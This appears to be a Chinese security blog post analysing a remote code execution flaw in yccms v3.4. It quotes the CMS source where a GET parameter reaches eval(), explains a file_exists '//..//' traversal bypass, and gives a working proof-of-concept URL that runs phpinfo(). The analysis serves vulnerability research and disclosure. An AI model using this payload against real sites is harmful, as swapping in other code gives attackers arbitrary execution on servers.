<!DOCTYPE html>
<html>
  <!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  
  <title>web漏洞@yccms v3.4代码执行漏洞 - 打渔为生</title>
  <link rel="icon" href="https://i.imgur.com/SrZt9VU.jpg" type="image/x-icon">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
  
  <meta name="keywords" content=>
  
    <meta name="description" content="全平台漏洞挖掘手记">
  
  
  
    <link rel="alternate" href="/atom.xml " title="打渔为生" type="application/atom+xml">
  

  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.3.0"></head>

  <body>
    <div class="container">
      <header class="header">
  <div class="blog-title">
    <a href="/" class="logo">打渔为生</a>
    <div class="subtitle">tutucoo的技术笔记</div>
  </div>
  <nav class="navbar">
    <ul class="menu">
      
        <li class="menu-item">
          <a href="/" class="menu-item-link">主页</a>
        </li>
      
        <li class="menu-item">
          <a href="/summary" class="menu-item-link">Summary</a>
        </li>
      
        <li class="menu-item">
          <a href="/about" class="menu-item-link">关于</a>
        </li>
      
        <li class="menu-item">
          <a href="/atom.xml" class="menu-item-link">RSS</a>
        </li>
      
    </ul>
  </nav>
</header>

<article class="post">
  <div class="post-title">
    <h1 class="article-title">web漏洞@yccms v3.4代码执行漏洞</h1>
  </div>

  <!-- 文章目录 -->
  <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#yccms-v3-4-%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E"><span class="toc-text">yccms v3.4 代码执行漏洞</span></a></li></ol>

  <div class="post-content">
    <h1 id="yccms-v3-4-代码执行漏洞"><a href="#yccms-v3-4-代码执行漏洞" class="headerlink" title="yccms v3.4 代码执行漏洞"></a>yccms v3.4 代码执行漏洞</h1><p>查看/admin/index.php文件，这是后台首页的源代码，我们来看看里面的逻辑</p>
<p>这个文件主要的功能是通过require包含了run.inc.php文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">require</span> str_replace(<span class="string">&#x27;\\&#x27;</span>,<span class="string">&#x27;/&#x27;</span>,substr(dirname(<span class="keyword">__FILE__</span>),<span class="number">0</span>,<span class="number">-6</span>)).<span class="string">&#x27;/config/run.inc.php&#x27;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>接着看下run.inc.php文件</p>
<p>这个文件的主要的作用是自动加载类，这些类都在controller、model、public/class目录下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//开启session</span></span><br><span class="line">session_start();</span><br><span class="line"><span class="comment">//超时时间</span></span><br><span class="line">@set_time_limit(<span class="number">0</span>);</span><br><span class="line"><span class="comment">//设置编码</span></span><br><span class="line">header(<span class="string">&#x27;Content-Type:text/html;charset=utf-8&#x27;</span>);</span><br><span class="line"><span class="comment">//错误级别,报告警告之外的所有错误</span></span><br><span class="line">error_reporting(E_ALL ^ E_NOTICE);</span><br><span class="line"><span class="comment">//设置时区</span></span><br><span class="line">date_default_timezone_set(<span class="string">&#x27;PRC&#x27;</span>); </span><br><span class="line"><span class="comment">//网站绝对根路径</span></span><br><span class="line">define(<span class="string">&#x27;ROOT_PATH&#x27;</span>,str_replace(<span class="string">&#x27;\\&#x27;</span>,<span class="string">&#x27;/&#x27;</span>,substr(dirname(<span class="keyword">__FILE__</span>),<span class="number">0</span>,<span class="number">-7</span>))); </span><br><span class="line"><span class="comment">//引入配置文件</span></span><br><span class="line"><span class="keyword">require</span> ROOT_PATH.<span class="string">&#x27;/config/config.inc.php&#x27;</span>;</span><br><span class="line"><span class="comment">//引入Smarty</span></span><br><span class="line"><span class="keyword">require</span> ROOT_PATH.<span class="string">&#x27;/public/smarty/Smarty.class.php&#x27;</span>;</span><br><span class="line"><span class="comment">//自动加载类</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">__autoload</span>(<span class="params"><span class="variable">$_className</span></span>)</span>&#123;</span><br><span class="line">	<span class="keyword">if</span>(substr(<span class="variable">$_className</span>,<span class="number">-6</span>)==<span class="string">&#x27;Action&#x27;</span>)&#123;</span><br><span class="line">		<span class="keyword">require</span> ROOT_PATH.<span class="string">&#x27;/controller/&#x27;</span>.ucfirst(<span class="variable">$_className</span>).<span class="string">&#x27;.class.php&#x27;</span>;	</span><br><span class="line">	&#125;<span class="keyword">elseif</span>(substr(<span class="variable">$_className</span>, <span class="number">-5</span>) == <span class="string">&#x27;Model&#x27;</span>)&#123;</span><br><span class="line">		<span class="keyword">require</span> ROOT_PATH.<span class="string">&#x27;/model/&#x27;</span>.ucfirst(<span class="variable">$_className</span>).<span class="string">&#x27;.class.php&#x27;</span>;</span><br><span class="line">	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="keyword">require</span> ROOT_PATH.<span class="string">&#x27;/public/class/&#x27;</span>.ucfirst(<span class="variable">$_className</span>).<span class="string">&#x27;.class.php&#x27;</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//单入口</span></span><br><span class="line">Factory::setAction()-&gt;run();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>在看到public/class/目录下的Factory.class.php类文件的时候，发现了一个代码执行的漏洞，该漏洞可以通过eval函数执行任意代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Factory</span></span>&#123;</span><br><span class="line">	<span class="built_in">static</span> <span class="keyword">private</span> <span class="variable">$_obj</span>=<span class="literal">null</span>;</span><br><span class="line">	<span class="built_in">static</span> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">setAction</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="comment">#匹配get请求的a参数</span></span><br><span class="line">		<span class="variable">$_a</span>=<span class="built_in">self</span>::getA();</span><br><span class="line">		<span class="keyword">if</span> (in_array(<span class="variable">$_a</span>, <span class="keyword">array</span>(<span class="string">&#x27;admin&#x27;</span>, <span class="string">&#x27;nav&#x27;</span>, <span class="string">&#x27;article&#x27;</span>,<span class="string">&#x27;backup&#x27;</span>,<span class="string">&#x27;html&#x27;</span>,<span class="string">&#x27;link&#x27;</span>,<span class="string">&#x27;pic&#x27;</span>,<span class="string">&#x27;search&#x27;</span>,<span class="string">&#x27;system&#x27;</span>,<span class="string">&#x27;xml&#x27;</span>,<span class="string">&#x27;online&#x27;</span>))) &#123;</span><br><span class="line">				<span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;admin&#x27;</span>])) &#123;</span><br><span class="line">				header(<span class="string">&#x27;Location:&#x27;</span>.<span class="string">&#x27;?a=login&#x27;</span>);</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span> (!file_exists(ROOT_PATH.<span class="string">&#x27;/controller/&#x27;</span>.ucfirst(<span class="variable">$_a</span>).<span class="string">&#x27;Action.class.php&#x27;</span>)) <span class="variable">$_a</span> = <span class="string">&#x27;Login&#x27;</span>;</span><br><span class="line">		<span class="keyword">eval</span>(<span class="string">&#x27;self::$_obj = new &#x27;</span>.ucfirst(<span class="variable">$_a</span>).<span class="string">&#x27;Action();&#x27;</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="built_in">self</span>::<span class="variable">$_obj</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	<span class="built_in">static</span> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">setModel</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">		<span class="variable">$_a</span> = <span class="built_in">self</span>::getA();</span><br><span class="line">		<span class="keyword">if</span> (file_exists(ROOT_PATH.<span class="string">&#x27;/model/&#x27;</span>.<span class="variable">$_a</span>.<span class="string">&#x27;Model.class.php&#x27;</span>)) <span class="keyword">eval</span>(<span class="string">&#x27;self::$_obj = new &#x27;</span>.ucfirst(<span class="variable">$_a</span>).<span class="string">&#x27;Model();&#x27;</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="built_in">self</span>::<span class="variable">$_obj</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="built_in">static</span> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getA</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">		<span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>]) &amp;&amp; !<span class="keyword">empty</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>]))&#123;</span><br><span class="line">			<span class="keyword">return</span> <span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>];</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">return</span> <span class="string">&#x27;login&#x27;</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>我们主要看产生漏洞的核心代码，我们要利用这个漏洞，就要让eval函数执行我们的代码，也就是说要先通过第一句代码的if检查，通过了if检查，我们的代码执行就更近一步了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (!file_exists(ROOT_PATH.<span class="string">&#x27;/controller/&#x27;</span>.ucfirst(<span class="variable">$_a</span>).<span class="string">&#x27;Action.class.php&#x27;</span>)) <span class="variable">$_a</span> = <span class="string">&#x27;Login&#x27;</span>;</span><br><span class="line">		<span class="keyword">eval</span>(<span class="string">&#x27;self::$_obj = new &#x27;</span>.ucfirst(<span class="variable">$_a</span>).<span class="string">&#x27;Action();&#x27;</span>);</span><br></pre></td></tr></table></figure>
<p>所以我们要解决两个问题：</p>
<p>1.file_exists逃逸</p>
<p>2.eval代码执行，并且插入我们的代码</p>
<p>下面我们来解决这两个问题</p>
<p>1.file_exists逃逸</p>
<p>这个file_exists会检查提供的文件路径是否存在，显然这里检查的是controller目录下的文件是否存在</p>
<p>我们可以看到controller目录下存在的一些文件，可以看到正好存在一个Action.class.php，如果a参数传递的是空，也是可以通过if检查的，那么如何传递个“空的”a参数呢并且还能执行代码呢？接着往下看</p>
<p><img src="https://i.loli.net/2021/04/18/VZEQXkxBNFvCTMU.png" alt="yccms%20v3%204%20%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2066dbd424c9b24c04a72fd07e38cfa606/Untitled.png"></p>
<p>file_exists函数本身存在一个bug，当接收的字符串中存在..//的时候会自动找到上一层目录，因此我们传递的a参数可以是这样的，在经过file_exists函数的时候会先执行到phpinfo();//，因为这里碰到个//，所以它会进入下一层目录，接着会碰到..//就会回到上一层目录，这样即执行了我们的代码，也相当于传了个“空的”参数，因为它去找了下一层目录，接着又往上一层目录去找，还是会找到Action.class.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">phpinfo();<span class="comment">//..//</span></span><br></pre></td></tr></table></figure>
<p>我们进行个小测试，我的C盘下存在C://GameCS/Counter-Strike目录</p>
<p><img src="https://i.loli.net/2021/04/18/Iv9zdRiFPsbDfkW.png" alt="yccms%20v3%204%20%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2066dbd424c9b24c04a72fd07e38cfa606/Untitled%201.png"></p>
<p>通过执行下面的代码，返回的是1，这样不仅通过了检查，还执行了我们的代码phpinfo();</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> file_exists(<span class="string">&#x27;C://GameCS//phpinfo();//..//Counter-Strike&#x27;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/04/18/WOCfPDRura9Sy6m.png" alt="yccms%20v3%204%20%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2066dbd424c9b24c04a72fd07e38cfa606/Untitled%202.png"></p>
<p>所以我们只要在a参数中传递下面的字符串就可以绕过if判断了，</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//192.168.0.21/yccms_v3.4/admin/?a=phpinfo();//..//</span></span><br></pre></td></tr></table></figure>
<p>2.eval执行我们的代码</p>
<p>光是绕过if判断还不够，我们看下eval函数执行时的操作，eval可以执行php代码，这里它进行了new操作，本意是想通过拼接，以动态的方式创建一个对象</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">eval</span>(<span class="string">&#x27;self::$_obj = new &#x27;</span>.ucfirst(<span class="variable">$_a</span>).<span class="string">&#x27;Action();&#x27;</span>);</span><br></pre></td></tr></table></figure>
<p>但是如果我们以上面的exp去打，显然就会变成下面这样，这样程序就会报错，因为不存在phpinfo()对象</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">self</span>::<span class="variable">$_obj</span> = <span class="keyword">new</span> phpinfo();<span class="comment">//..//</span></span><br></pre></td></tr></table></figure>
<p>可以看到它会去public/class目录下去找phpinfo.class.php，这显示是不存在的</p>
<p><img src="https://i.loli.net/2021/04/18/KSqj9awp7g4RmGN.png" alt="yccms%20v3%204%20%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2066dbd424c9b24c04a72fd07e38cfa606/Untitled%203.png"></p>
<p>我们需要让它创建一个存在的对象，public/class目录下是存在DB.class.php文件的，因此我们最终的exp可以是这样</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//192.168.0.21/yccms_v3.4/admin/?a=DB();phpinfo();//..//</span></span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/04/18/WQBdGsqNfXUHLC3.png" alt="yccms%20v3%204%20%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2066dbd424c9b24c04a72fd07e38cfa606/Untitled%204.png"></p>

  </div>
  <div class="post-meta">
    <span class="post-time" style="color:#646060;font-size:13px">2021-04-18</span>
  </div>

  <div class="post-footer">
    

    <a href="#top" class="top">返回顶部</a>
  </div>
</article>

<!-- 评论插件 -->

<footer>
  2021
  <span class="author">
    tutucoo
  </span>
</footer>


    </div>
  </body>
</html>